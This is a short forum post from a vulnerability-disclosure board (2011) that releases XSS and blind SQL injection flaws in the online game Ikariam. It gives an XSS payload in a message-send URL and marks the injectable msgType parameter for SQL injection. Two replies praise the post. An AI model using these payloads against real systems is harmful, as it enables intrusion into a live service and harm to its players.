Ikariam - multiple vulnerabilities

BugTrack

Ikariam - multiple vulnerabilities#
Hi there,

as I promised im gonna release my 0day for known on-line game ikariam.

1. XSS

screenshot: [link]

url: /index.php?action=Messages&function=sen
d&receiverId=112&msgType=50&con
tent="><BODY ONLOAD=alert(3)>

2. Blind SQLi

screenshots:
[link]

Can you find difference? :P

URL: index.php?action=Messages&function=send
&receiverId=406&msgType=50<SQLi&
gt;&content=whatever,


Peace out.
(odpovědět)
RnmX | 193.200.150.*13.8.2011 18:38
re: Ikariam - multiple vulnerabilities#
Nice found man.... Great post thank you
(odpovědět)
Reflex | 213.81.161.*13.8.2011 22:04

Zpět
 
 
 

 
BBCode